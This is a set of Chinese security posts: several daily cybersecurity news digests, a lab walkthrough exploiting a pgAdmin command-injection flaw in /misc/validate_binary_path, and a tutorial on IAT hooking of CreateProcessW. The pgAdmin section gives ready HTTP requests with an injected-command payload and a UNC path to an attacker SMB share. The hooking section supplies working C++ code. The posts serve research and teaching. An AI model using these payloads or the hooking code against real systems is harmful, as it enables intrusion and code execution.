1、Arm公司警告Mali GPU驱动程序中已被利用的零日漏洞 https://developer.arm.com/Arm%20Security%20Center/Mali%20GPU%20Driver%20Vulnerabilities Arm警告说，Mali GPU内核驱动程序中存在一个安全漏洞，该漏洞已在野外被积极利用。该漏洞被追踪为CVE-2024-4610，使用后释放（use-after-free）问题影响以下产品：Bifrost GPU内核驱动程序（从r34p0到r40p0的所有版本）、Valhall GPU内核驱动程序（从r34p0到r40p0的所有版本）。“一个本地非特权用户可以通过不当的GPU内存处理操作访问已释放的内存。”该公司在上周 2、Snowflake数据泄露事件影响上百家企业信息 https://thehackernews.com/2024/06/snowflake-breach-exposes-165-customers.html 多达165名Snowflake客户的信息可能在一场正在进行的数据盗窃和勒索活动中暴露，这表明该操作的影响比之前认为的更广泛。研究人员正在协助云数据仓库平台进行事件响应工作，正在追踪这一尚未分类的活动集群，称之为UNC5537，并将其描述为一个以财务为动机的威胁行为者。UNC5537正在系统地利用被盗的客户凭证入侵Snowflake客户实例，在网络犯罪论坛上广告受害者数据，并试图勒索许多受害者。UNC5537已经针对全球数百个组织，并经常通 3、Gitloker攻击滥用GitHub通知传播恶意oAuth应用 https://www.bleepingcomputer.com/news/security/gitloker-attacks-abuse-github-notifications-to-push-malicious-oauth-apps/ 攻击者假冒GitHub的安全和招聘团队，通过网络钓鱼攻击使用恶意OAuth应用劫持存储库，在持续的勒索活动中擦除被破坏的存储库。自至少2月份以来，数十名开发人员在这次活动中收到类似的假工作邀请或安全警报电子邮件，这些邮件来自"notifications@github.com"，这些邮件是在被破坏的GitHub账户使用的垃圾评论中标记在随机存储库问题或拉取 4、More_eggs恶意软件通过伪装简历对招聘人员发起网络钓鱼攻击 https://www.esentire.com/blog/more-eggs-activity-persists-via-fake-job-applicant-lures 研究人员发现了一起通过伪装成简历分发More_eggs恶意软件的钓鱼攻击，这种技术最早在两年前被检测到。具体来说，目标对象是一名招聘人员，威胁行为者通过伪装成求职者欺骗他们，并诱导他们访问其网站以下载加载程序，More_eggs被认为是一个名为Golden Chickens（又名Venom Spider）的威胁行为者的作品，是一个模块化后门，能够收集敏感信息。它以恶意软件即服务（MaaS）模式提供给其他犯罪行为者。 5、Apple 修复了其虚拟现实头戴设备Vision Pro 漏洞 https://www.securityweek.com/apple-patches-vision-pro-vulnerability-used-in-first-ever-spatial-computing-hack/ 苹果公司周一将其 Vision Pro 虚拟现实头戴设备的操作系统 visionOS 更新至 1.2 版本，该版本修复了多个漏洞，其中包括可能是该产品特有的第一个安全漏洞。visionOS 1.2 修补了近二十个漏洞。然而，这些漏洞中的绝大多数都存在于 visionOS 与其他 Apple 产品（如 iOS、macOS 和 tvOS）共享的组件中。 6、多个漏洞影响已停产的 Netgear WNR614 路由器 https://www.securityweek.com/multiple-vulnerabilities-plague-discontinued-netgear-wnr614-routers/ Redfox Security 警告称，已停产的 Netgear WNR614 路由器中存在漏洞，允许攻击者绕过身份验证、拦截通信和检索凭据。 7、微软修复了Microsoft 消息队列中的远程代码执行漏洞 https://www.securityweek.com/patch-tuesday-remote-code-execution-flaw-in-microsoft-message-queuing/ 微软周二呼吁 Windows 管理员紧急关注微软消息队列 (MSMQ) 组件中一个严重的远程代码执行漏洞的补丁。该漏洞被标记为CVE-2024-30080，CVSS 严重性评分为 9.8/10，攻击者可以通过向 MSMQ 服务器发送特制的恶意 MSMQ 数据包来利用该漏洞。 8、日本视频网站NicoNico遭遇网络攻击被迫暂停服务 https://securityaffairs.com/164395/security/niconico-victim-cyber-attack.html 2024 年 6 月 8 日，日本视频共享平台 Niconico 遭受大规模网络攻击后暂停了服务。针对此次事件，公司暂时停止了Niconico视频、Niconico直播、Niconico频道等Niconico家庭服务，并暂停了外部服务上的Niconico账号登录。 9、因舆论压力，微软将Recall功能默认设置为关闭 持续不断的公众投诉，微软已经意识到其最近预览的 Windows Recall 功能的安全性有很多不足之处，并宣布了重要改变。该功能现在是可选的。“如果你不主动选择打开它，它将默认关闭。” 10、大选开始之际，欧盟各政党遭受 DDoS 攻击 近日，欧洲议会选举在荷兰正式启动，未来几天将陆续在欧盟其它国家举行，这一时期成为了网络攻击事件的”高发期“。Cloudflare 在一份报告中指出，大量威胁攻击者正在针对欧洲各国的政党，发动大规模 DDoS 攻击。 https://www.freebuf.com/news/403170.html 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

https://ftp.postgresql.org/pub/pgadmin/pgadmin4/v5.7/source/pgadmin4-5.7.tar.gz 下载 pgadmin5.7 的源码 首先从代码层面进行分析 接口 /validate_binary_path 最后调用了 subprocess.getoutput( 来执行了命令 这一部分代码是对传入的路径进行检测，如果是在 linux 下直接拼接，在windows 下部署，后缀中会添加 .exe 。同时 windows下恶意的exe文件必须是下面几个文件名之一 'pg_dump', 'pg_dumpall', 'pg_restore', 'psql' linux 可以从 docker hub 上搜索 docker 资源 https://hub.docker.com/search?q=pgadmin docker pull dpage/pgadmin4:6.16 docker run -e 'PGADMIN_DEFAULT_EMAIL=test@example.com' -e 'PGADMIN_DEFAULT_PASSWORD=123456'  -p 5050:80 --name pgadmin -d  docker.io/dpage/pgadmin4:6.16 直接构造发送会提示 The CSRF token is missing. 所以我们先请求路由 login POST /misc/validate_binary_path HTTP/1.1 Host: 127.0.0.1:5050 Upgrade-Insecure-Requests: 1 X-pgA-CSRFToken:ImI1OWE1NjQ3ZDZlYjBkYzFmMjgzYzE3MTEyMGRiZTA0MWYwM2YwMjgi.ZhUBBQ.S3V3X0JmCbEcwcpWZkf1TVYVRS4 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PGADMIN_LANGUAGE=en;pga4_session=bada494b-009f-4c04-bded-20497c5dcf74!pMVxVlI925/AqyV9Oq0RqiPecdo0fWg2hWYHxGDEpYc=; Connection: close Content-Type: application/json Content-Length: 33 {"utility_path":"a\";ifconfig;#"} import os binary_path = "a\";ifconfig;#" UTILITIES_ARRAY = ['pg_dump', 'pg_dumpall', 'pg_restore', 'psql'] for utility in UTILITIES_ARRAY:    full_path = os.path.abspath(        os.path.join(binary_path, (utility if os.name != 'nt' else (utility + '.exe')))   )    print(full_path) 我们简化代码在linux 下执行，最后利用; 分割执行命令 windows 下载软件并进行安装 https://ftp.postgresql.org/pub/pgadmin/pgadmin4/v5.7/windows/pgadmin4-5.7-x64.exe 我们发现同样在 windows 下拼接时是无法利用; 分割执行命令，但是可以通过 UNC path指定攻击者的恶意文件 import os binary_path = "\\\\192.168.222.1\\TMP\\" UTILITIES_ARRAY = ['pg_dump', 'pg_dumpall', 'pg_restore', 'psql'] for utility in UTILITIES_ARRAY:    full_path = os.path.abspath(        os.path.join(binary_path, (utility if os.name != 'nt' else (utility + '.exe')))   )    print(full_path) 我们发现通过构造传入参数，我们可以伪造共享地址 windows 下的环境始终无法启动 web 界面，因为环境实在太老了，启动 C:\Users\username\AppData\Local\Programs\pgAdmin 4\v5\web\setup.py 各种版本问题，一直没办法启动成功，所以只做理论上的验证 后来我发现安装完成之后，会在界面下提供一个python目录，所以直接选择该python 来启动项目，需要把C:\Users\username\AppData\Local\Programs\pgAdmin 4\v5\web 下的config.py 修改 DEFAULT_SERVER \= '0.0.0.0' 使用impacket提供的smbserver.py脚本构造恶意的smb服务 smbserver.py TMP /tmp 编译恶意的exe文件并放到对应目录 pip install pyinstaller type execute_calc.py import subprocess def execute_calc():    subprocess.call("calc.exe") if __name__ == "__main__":    execute_calc() pyinstaller --onefile execute_calc.py POST /misc/validate_binary_path HTTP/1.1 Host: 192.168.222.145:5050 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 X-pgA-CSRFToken: Ijg5MDJjOGQ2YmVlNTA1NDMwZjFmODA1ZWNjYTIyNzg5MjExM2EzNDci.Zi3CIg.9u2mEcj30C2tPX0soO3L7tJrp5w Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: pga4_session=9cd07409-7aca-46c3-8635-e615a7fcd4ac!lthUHprxGzxRdWMWfPm1VLDOLpk=; Connection: close Content-Type: application/json Content-Length: 45 {"utility_path":"\\\\192.168.222.128\\TMP\\"}   ‍

1、黑客组织入侵迪士尼Confluence服务器并窃取2.5GB数据 https://www.bleepingcomputer.com/news/security/club-penguin-fans-breached-disney-confluence-server-stole-25gb-of-data/ 声称Club Penguin粉丝的黑客组织入侵了迪士尼的Confluence服务器，窃取了他们最喜欢游戏的信息，但最终得手的是2.5GB的内部公司数据。Club Penguin是一款于2005年至2018年间运营的多人在线游戏（MMO），玩家可以在虚拟世界中参与游戏、活动并与其他玩家聊天。该游戏最初由New Horizon Interactive创建，后来被 2、3.61亿被盗邮件账户在Telegram泄露并供公开检索 https://www.bleepingcomputer.com/news/security/361-million-stolen-accounts-leaked-on-telegram-added-to-hibp/ 一大批包含3.61亿个被盗电子邮件地址的数据已被添加到“Have I Been Pwned”数据泄露通知服务中，这些账户信息来自密码窃取恶意软件、凭证填充攻击和数据泄露。现在，任何人都可以检查他们的账户是否被泄露。网络安全研究人员从多个Telegram网络犯罪频道收集了这些凭证，这些频道通常泄露被盗数据以建立声誉和吸引订阅者。被盗数据通常以以下形式泄露：被盗数据通常以用户名和密 3、 研究人员发现Azure Service Tags服务存在严重漏洞 http://www.tenable.com/blog/these-services-shall-not-pass-abusing-service-tags-to-bypass-azure-firewall-rules-customer 安全研究人员发现了Azure Service Tags中的一个高严重性漏洞，可能允许攻击者访问客户的私人数据。Service Tags是特定Azure服务的IP地址组，用于防火墙过滤和基于IP的访问控制列表（ACLs），当需要网络隔离以保护Azure资源时使用。这是通过阻止传入或传出的互联网流量，仅允许Azure服务流量来实现的。威胁行为者可以利用该漏洞制作 4、SPECTR恶意软件针对乌克兰防御部队发起攻击 https://cert.gov.ua/article/6279600 乌克兰计算机应急响应小组（CERT-UA）警告称，针对该国防御部队的网络攻击使用了一种名为SPECTR的恶意软件，这是名为SickSync的间谍活动的一部分。该机构将这些攻击归因于一个被称为UAC-0020的威胁行为者，该行为者也被称为Vermin，被评估为与卢甘斯克人民共和国（LPR）的安全机构有关。LPR在2022年2月俄罗斯对乌克兰的军事入侵前几天被俄罗斯宣布为一个主权国家。攻击链始于包含一个RAR自解压存档文件的钓鱼电子邮件，该文件包含一个诱饵PDF文件、一个包含SPECTR负载的被木马化的SyncThing应用 5、黑客组织滥用BoxedApp商业打包软件规避恶意软件检测 https://research.checkpoint.com/2024/inside-the-box-malwares-new-playground/ 威胁行为者越来越多地滥用BoxedApp等合法且商业可用的打包软件以规避检测并分发远程访问木马和信息窃取者等恶意软件。绝大多数被归因的恶意样本针对金融机构和政府行业。以BoxedApp打包提交到Google拥有的VirusTotal恶意软件扫描平台的样本数量在2023年5月左右出现了激增，Israeli网络安全公司补充说，样本提交主要来自土耳其、美国、德国、法国和俄罗斯。通过这种方式分发的恶意软件家族包括Agent Tesla、AsyncR 6、Google Maps时间轴数据计划将存储于本地设备以保护隐私 https://blog.google/products/maps/updates-to-location-history-and-new-controls-coming-soon-to-maps/ Google宣布计划从2024年12月1日起将Maps时间轴数据存储在用户的设备上，而不是其Google账户中。这项变化最初由科技巨头在2023年12月宣布，伴随着启用位置历史记录时的自动删除控制更新，将其默认设置为三个月，而不是之前的18个月。顾名思义，Google Maps时间轴帮助用户跟踪路线、行程和他们曾到过的地方，假设启用了位置历史记录和Web与应用活动设置。但随着最新的更改以在用户设 7、PHP存在严重安全漏洞可导致远程代码执行 https://devco.re/blog/2024/06/06/security-alert-cve-2024-4577-php-cgi-argument-injection-vulnerability-en/ 有关影响PHP的新严重安全漏洞的详细信息已经出现，在某些情况下可以利用该漏洞实现远程代码执行。该漏洞被追踪为CVE-2024-4577，被描述为影响Windows操作系统上安装的所有PHP版本的CGI参数注入漏洞。这个缺陷可以绕过为另一个安全漏洞CVE-2012-1823设置的保护措施。在2024年5月7日负责任披露后，已经在PHP版本8.3.8、8.2.20和8.1.29中提供了 8、研究人员披露攻击者入侵并清除GitHub仓库进行勒索 https://www.bleepingcomputer.com/news/security/new-gitloker-attacks-wipe-github-repos-in-extortion-scheme/ 攻击者正在瞄准GitHub仓库，擦除其内容，并要求受害者通过Telegram联系获取更多信息。这场活动背后的威胁行为者，在Telegram上使用Gitloker的用户名并冒充网络事件分析师，很可能是使用被盗凭证入侵目标的GitHub账户。随后，他们声称窃取了受害者的数据，创建了一个备份，可以帮助恢复被删除的数据。然后，他们会重命名仓库，并添加一个README.me文件，指示受害者通 9、研究人员披露ExCobalt组织基于Go语言编写的GoRed后门 https://www.ptsecurity.com/ru-ru/research/pt-esc-threat-intelligence/ex-cobalt-go-red-tehnika-skrytogo-tunnelya/ 研究人员发现了一个之前未知的用Go语言编写的后门，我们将其归因于ExCobalt组织。ExCobalt是一个专注于网络间谍活动的网络犯罪组织，其成员至少自2016年起活跃，据信是臭名昭著的Cobalt组织的成员。Cobalt组织攻击金融机构以盗取资金，其显著特点是使用CobInt工具，而ExCobalt组织自2022年起开始使用该工具。研究人员与ExCobalt组织有关 10、纽约时报公司内部源代码和数据遭遇泄漏 https://www.bleepingcomputer.com/news/security/new-york-times-source-code-stolen-using-exposed-github-token/ 纽约时报公司确认，属于其的内部源代码和数据在2024年1月被从公司的GitHub代码库中盗取，并在4chan论坛上泄露。一名匿名用户周四在4chan上发布了一个包含被盗数据的273GB档案的种子文件。“基本上所有属于纽约时报公司的源代码，270GB。”4chan论坛帖子中写道。“总共有大约5千个代码库（其中不到30个是额外加密的），共计360万个文件，未压缩的tar格式。”威胁 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、Zyxel发布针对EoL NAS设备固件的漏洞补丁 https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-multiple-vulnerabilities-in-nas-products-06-04-2024 Zyxel发布了安全更新，以解决其两个已达到寿命终止（EoL）状态的网络附加存储（NAS）设备中影响严重的漏洞。成功利用五个漏洞中的三个可能允许未经认证的攻击者在受影响的安装上执行操作系统（OS）命令和任意代码。受影响的型号包括运行版本V5.21(AAZF.16)C0及更早版本的NAS326，以及运行版本V5.21( 2、汽车零部件供应商Advance Auto Parts上亿客户数据泄露 https://www.bleepingcomputer.com/news/security/advance-auto-parts-stolen-data-for-sale-after-snowflake-attack/ 威胁行为者声称正在出售从领先的汽车售后市场零部件供应商Advance Auto Parts公司窃取的3TB数据，这些数据是在攻破该公司Snowflake账户后被盗取的。Advance Auto Parts在美国、加拿大、波多黎各、美属维尔京群岛、墨西哥和多个加勒比海岛经营着4,777家门店和320个Worldpac分支机构，并为1,152家独立拥有的Carquest门店提供 3、研究人员披露TargetCompany勒索软件的Linux变种 https://www.trendmicro.com/en_us/research/24/f/targetcompany-s-linux-variant-targets-esxi-environments.html 研究人员观察到TargetCompany勒索软件家族的新Linux变种，使用定制的shell脚本针对VMware ESXi环境投放和执行有效载荷。TargetCompany勒索软件操作也被称为Mallox、FARGO和Tohnichi，于2021年6月出现，主要针对台湾、韩国、泰国和印度的组织进行数据库攻击（MySQL、Oracle、SQL Server）。TargetCompa 4、RansomHub勒索软件针对全球医疗企业发起攻击 https://symantec-enterprise-blogs.security.com/threat-intelligence/ransomhub-knight-ransomware 研究人员对一种名为RansomHub的新生勒索软件的分析表明，它是更新和改名后的Knight勒索软件，Knight勒索软件本身是另一种名为Cyclops的勒索软件的进化版本。Knight（也称为Cyclops 2.0）勒索软件首次出现在2023年5月，采用双重勒索策略，窃取和加密受害者的数据以获取经济利益。它在多个平台上运行，包括Windows、Linux、macOS、ESXi和Android。在RAMP 5、FBI 已获得超过 7,000 个 LockBit 勒索软件解密密钥 https://www.securityweek.com/fbi-says-it-has-7000-lockbit-ransomware-decryption-keys/ 联邦调查局一名官员周三表示，该机构已获得 7,000 多个 LockBit 勒索软件解密密钥，并敦促受害者与其联系。文件遭到 LockBit 3.0 勒索软件加密的实体也可以尝试使用日本警方开发的解密器来恢复他们的文件，该解密器可在 NoMoreRansom 项目的网站上找到。 6、Muhstik 僵尸网络利用RocketMQ 漏洞扩大 DDoS 攻击 https://thehackernews.com/2024/06/muhstik-botnet-exploiting-apache.html 名为Muhstik的分布式拒绝服务 (DDoS) 僵尸网络利用影响 Apache RocketMQ 的现已修补的安全漏洞来选择易受攻击的服务器并扩大其规模。 7、谷歌意外泄露内部文档，被指欺骗SEO行业多年 https://www.secrss.com/articles/66749 近日，由于谷歌内部机器人“误操作”，一批描述谷歌如何对网页排名的内部文档在线泄露。由于这些文档披露的搜索排名机制与谷歌公开发布的规则并不完全一致，一些知名SEO专家指责谷歌欺骗了整个行业多年。 8、Ariane Systems酒店自助入住系统存在漏洞可导致信息泄露 https://www.pentagrid.ch/en/blog/ariane-allegro-hotel-check-in-terminal-kios-escape/ 数千家酒店安装的Ariane Systems自助入住系统存在一个可绕过终端模式的漏洞，该漏洞可能允许访问客人的个人信息和其他房间的钥匙。这些终端允许客人自行预订和办理入住手续，通过POS子系统处理付款流程、打印发票并提供用作房间钥匙的RFID传感器。早在三月份，安全研究员发现，他可以轻松绕过他所住酒店自助入住终端上运行的Ariane Allegro Scenario Player的终端模式，并访问包含所有客户详细信息的底层W 9、Ticketmaster 信息泄露案Snowflake 或是泄密源头 https://www.freebuf.com/news/402774.html 安全研究人员表示，在云存储公司 Snowflake 数据泄露事件中，Ticketmaster 和其他多家机构的大量信息被盗。 10、伦敦国家医疗服务系统因勒索软件陷入瘫痪 https://hackread.com/london-nhs-ransomware-hospitals-targeted/ 该事件严重影响了医疗服务的提供，特别是输血和检验结果的提供，并导致医院无法连接到提供病理服务的私营公司的服务器。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、俄罗斯电力公司及政府机构遭遇Decoy Dog木马攻击 https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/hellhounds-operation-lahat-part-2/ 俄罗斯的组织正遭遇网络攻击，这些攻击被发现是传递一种名为诱饵狗的Windows版本恶意软件。网络安全公司正在跟踪这一活动集群，名为“Operation Lahat”，并将其归因于一个名为“HellHounds”的高级持续威胁（APT）组织。HellHounds小组会攻破他们选择的组织并在其网络中隐藏多年未被发现。在此过程中，该小组利用了主要的入侵向量，从漏洞的Web服务到可信赖的关系。 2、Telerik报告产品漏洞可能允许恶意创建管理员账号 https://docs.telerik.com/report-server/knowledge-base/registration-auth-bypass-cve-2024-4358 Progress Software已经推出更新，以解决影响Telerik报告服务器的一个关键安全漏洞，该漏洞可能被远程攻击者利用绕过身份验证并创建恶意管理员用户。该问题被跟踪为CVE-2024-4358，具有最高10.0分中的CVSS评分9.8。该公司在一份咨询报告中表示：“在Progress Telerik报告服务器2024 Q1版本（10.0.24.305）或更早版本中，运行在IIS上，未经认证的攻击者可 3、美国无线电中继联盟ARRL称其遭遇网络攻击 https://www.arrl.org/news/arrl-systems-service-disruption 美国无线电中继联盟（ARRL）分享了有关5月份一起网络攻击的更多信息，该攻击使其“世界日志簿”（Logbook of the World）离线，并导致一些成员因信息不足。ARRL是美国的业余无线电全国协会，代表业余无线电的利益向政府监管机构反映，并为全国的爱好者推广活动和教育计划。5月16日，ARRL宣布其网络和总部系统遭遇了一起“涉及访问的严重事件”。由于ARRL没有提供进一步的信息，成员们对组织的透明度表示担忧。今天，ARRL终于分享了有关此次网络攻击的更多细节，称这次攻击 4、FBI警告称攻击者发布虚假远程工作广告诈骗加密货币 https://www.ic3.gov/Media/Y2024/PSA240604 FBI发出警告，称诈骗者利用虚假的远程工作广告，以合法公司招聘人员的身份，诱骗美国各地的求职者并窃取加密货币。这些在家工作的骗局旨在通过简单易完成的任务，如在线评价各种企业或“优化”某项服务，吸引潜在受害者。FBI警告称：“诈骗者冒充合法企业，如人力资源或招聘机构，可能通过未经请求的电话或消息联系受害者。”诈骗者设计了一个复杂的报酬结构，要求受害者支付加密货币才能赚更多的钱或‘解锁’工作，而这些支付直接进入诈骗者的口袋。为了使其欺诈计划更具说服力，诈骗者还会要求受害者使用一个虚假的门户网站，展示他们赚了多少钱 5、攻击者利用Excel宏在乌克兰发起多阶段恶意软件攻击 https://www.fortinet.com/blog/threat-research/menace-unleashed-excel-file-deploys-cobalt-strike-at-ukraine 研究人员观察到一场新的复杂网络攻击，目标是定位在乌克兰的终端，旨在部署Cobalt Strike并控制被攻破的主机。根据Fortinet FortiGuard Labs的报告，攻击链涉及一个嵌入VBA宏的Microsoft Excel文件以启动感染。安全研究员在周一的报告中表示：“攻击者使用多阶段恶意软件策略来传递臭名昭著的‘Cobalt Strike’有效载荷，并与命令与控制（C 6、TikTok 零日漏洞被利用，可劫持账户 https://www.bleepingcomputer.com/news/security/tiktok-fixes-zero-day-bug-used-to-hijack-high-profile-accounts/ 近日，攻击者利用社交媒体直接消息功能中的零日漏洞，劫持了多家知名公司和人物的TikTok 账户。TikTok发言人证实，索尼、希尔顿、美国有线电视新闻网(CNN)等用户的账户已遭到黑客劫持，为了防止被滥用被迫暂时删除。此次黑客攻击的程度还不得而知，但是TikTok发言人补充说，“被入侵的账户数量非常少”。在零日漏洞被修复之前，或将不会分享有关被利用漏洞的任何细节。 7、恶意软件可能会窃取 WINDOWS RECALL收集的数据 https://securityaffairs.com/164181/digital-id/malware-steal-data-windows-recall-tool.html 网络安全研究人员演示了恶意软件如何窃取新 Windows Recall 工具收集的数据。Microsoft Copilot+ 的 Recall 功能是一款人工智能工具，旨在帮助用户在 PC 上搜索过去的活动。该工具收集的数据在本地存储和处理。推出后，它引起了网络安全专家的安全和隐私担忧，因为它会扫描并保存计算机屏幕的定期截图，可能会泄露密码或财务信息等敏感数据。 8、思科解决了用于危害德国政府会议的 WEBEX 漏洞 https://securityaffairs.com/164173/breaking-news/cisco-webex-flaws-german-government-meetings.html 5月初，德国媒体Zeit Online披露，威胁行为者利用德国政府实施的思科Webex软件中的漏洞来访问内部会议。 思科称：“2024 年 5 月初，思科发现了 Cisco Webex Meetings 中的漏洞，我们现在认为这些漏洞被用于有针对性的安全研究活动，允许未经授权访问我们法兰克福数据中心托管的某些客户的 Cisco Webex 部署中的会议信息和元数据。这些错误已得到解决，并且截至 2 9、2024 年 6 月 Android 安全更新修复了 37 个漏洞 https://source.android.com/docs/security/bulletin/2024-06-01 Android 2024 年 6 月更新包含针对框架和系统组件中高严重性缺陷的补丁，解决了特权提升和信息泄露等问题。 10、微软将逐步弃用 Windows NTLM 身份验证协议 https://www.bleepingcomputer.com/news/microsoft/microsoft-deprecates-windows-ntlm-authentication-protocol/ 微软表示，目前仍广泛使用的 NTLM 协议自 6 月份起将不再开发，并将逐步淘汰，转而采用更安全的替代协议Kerberos。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

前置知识 导入表 在一个可执行文件需要用到其余DLL文件中的函数时，就需要用到导入表，用于记录需要引用的函数。例如我们编写的可执行文件需要用到CreateProcess函数，就需要用到kernel32.dll文件并且将其中的CreateProcess函数的信息导入到我们的可执行文件中，然后再调用。 为了管理这些导入函数，就构建了一个导入表进行统一的管理，简单来说，当我们编写的可执行文件中使用到导入函数就会去导入表中去搜索找到指定的导入函数，获取该导入函数的地址并调用。 因此加载器再调用导入函数之前需要先找到导入表的所在处。在可执行文件映射到内存空间是，都是以Dos Header开始的，在该头部存在elfanew的字段，用于记录PE文件头的偏移，在PE文件头存在可选头的结构体，该结构体中存储数据目录项，其中就包括了导入表。因此在内存中我们需要通过Dos Header -> Nt Header -> Option Header -> Import Table的顺序获取导入表。 这里使用《加密与解密》的图来看一下导入表的结构体，如下图。 可以看到导入表涉及的变量非常多，这里重点关注OriginalFirstThunk、FistThunk以及Name Name：指向导入库的名称。 OriginalFistThunk：指向输入名称表，里面存储了导入函数的信息。 FirstThunk：指向输入地址表，可以看到在初始化的时候OriginalFistThunk与FirstThunk指向的是同一块区域，即导入函数的信息。 输入名称表的结构体如下图，这里重点关注Ordinal与AddressOfData Ordinal：记录函数的序号，即导入函数以序号存储 AdressOfData：以函数命的形式记录导入函数 那么INT与IAT的区别在于，加载器会在从导入表中获取了导入函数名称后，会搜索该函数的名称并获取该函数的地址并填入到IAT中，因此在经历了加载器后，IAT中存储了实际地址。如下图。 导入地址表钩取技术 输入地址表钩取技术就是通过修改输入地址表的地址值，因此当调用该导入函数时会跳转到被篡改的地址上。 在钩取之前的状态如下图 在钩取之后的状态如下图 因此总结一下输入地址表钩取技术的流程 确定需要钩取的导入函数 获取输入地址表的地址 在输入地址表中搜索需要钩取的导入函数地址并且将导入函数地址修改为自定义的函数 在处理完之后需要在自定义函数中重新调用被钩取的函数 确定需要钩取的导入函数 首先确定可执行文件中存在什么导入函数，可以发现目标的可执行文件中导入了kernel32.dll的系统库，并且导入的CreateProcessW 那么采用输入地址表钩取方法钩取CreateProcessW函数。 获取导入地址表的地址 根据DOS Header -> Nt Header -> Option Header ->Import Table的顺序进行搜索，即可获取导入地址表的地址。 代码如下 ...        //获取当前进程的基地址    hMod = GetModuleHandle(NULL);    pBase = (PBYTE)hMod; //进程的基地址是从DOS头开始的    pImageDosHeader = (PIMAGE_DOS_HEADER)hMod; //通过e_lfanew变量获取NT头的偏移，然后加上基地址及NT头的位置    pImageNtHeaders = (PIMAGE_NT_HEADERS)(pBase + pImageDosHeader->e_lfanew); //数据目录项下标为1的项是导入表    pImageImportDescriptor = (PIMAGE_IMPORT_DESCRIPTOR)(pImageNtHeaders->OptionalHeader.DataDirectory[1].VirtualAddress + pBase) ... 获取导入函数地址并修改 在获取导入地址表的地址后，首先通过遍历导入表的结构体，提取其中的Name字段，判断是否为我们需要钩取的导入库名。在匹配完成后则选择继续遍历IAT中的函数地址，找到需要钩取的函数地址，找到后则修改为自定义函数的地址。 代码如下   ...    //遍历导入表项    for (; pImageImportDescriptor->Name; pImageImportDescriptor++)   {        //获取导入库的名称        szLibName = (LPCSTR)(pImageImportDescriptor->Name + pBase);        //比较导入库的名称，判断是否为kernel32.dll        if (!_stricmp(szLibName, szDllName))       {            //获取IAT            PIMAGE_THUNK_DATA pImageThunkData = (PIMAGE_THUNK_DATA)(pImageImportDescriptor->FirstThunk + pBase);            //获取导入函数地址            for (; pImageThunkData->u1.Function; pImageThunkData++)           {                //判断函数地址是否是需要钩取的函数地址，这里需要注意的是64位与32位地址的区别                if (pImageThunkData->u1.Function == (ULONGLONG)pfnOrg)               {                    //修改IAT的权限为可写                    VirtualProtect(&pImageThunkData->u1.Function, 4, PAGE_EXECUTE_READWRITE, &dwOldProtect);                    //将原始的地址修改为自定义函数地址                    pImageThunkData->u1.Function = (ULONGLONG)pfnNew;                    //将权限恢复                    VirtualProtect(&pImageThunkData->u1.Function, 4, dwOldProtect, &dwOldProtect);                    return TRUE;               }           }       }       ... 在自定义函数中重新调用被钩取的函数 这里需要注意的是，我们需要构建一个自定函数，该函数的返回类型与参数需要与钩取的函数一模一样，这样我们就可以获取所有参数的信息，然后篡改后重新传递给原始的导入函数，即可完成钩取。 代码如下，这里篡改原始CreateaProcessW函数的第一个参数，使计算器 ...    LPCWSTR applicationName = L"C:\\Windows\\System32\\calc.exe";        return ((LPFN_CreateProcessW)g_pOrgFunc)(applicationName,        lpCommandLine,        lpProcessAttributes,        lpThreadAttributes,        bInheritHandles,        dwCreationFlags,        lpEnvironment,        lpCurrentDirectory,        lpStartupInfo,        lpProcessInformation); ... 完整代码:https://github.com/h0pe-ay/HookTechnology/blob/main/Hook-IAT/iat.cpp 调试 刚开始使用的是xdbg调试，但是用的不太习惯，后面改用WinDbg还可以源码调试，这里记录一下需要用到的操作与指令。 符号表与源码加载 在设置中可以选择源码默认的目录以及符号表默认的目录，符号文件则是利用Visutal Studio编译生成的pdb文件。 其中srv*c:\Symbols*https://msdl.microsoft.com/download/symbols是下载官方的符号表文件，这里可以选择删掉只调试我们设置的文件。不然每次都需要下载一遍影响时间。 源码文件也可以在侧边栏选择Open source file选项打开。 DLL加载调试 由于钩取时需要先使用DLL注入技术将自定义的DLL文件注入进去，因此想要调试钩取过程则需要在DLL附着的时候打下断点。 利用sxe ld:xxx.dll即可在加载xxx.dll的时候打下断点。 利用sxe ud:xxx.dll即在卸载xxx.dll的时候打下断点。 关闭优化调试 防止自定义函数中的变量被优化导致不方便单步调试，在Visual Studio中可以选择关闭优化进行编译。

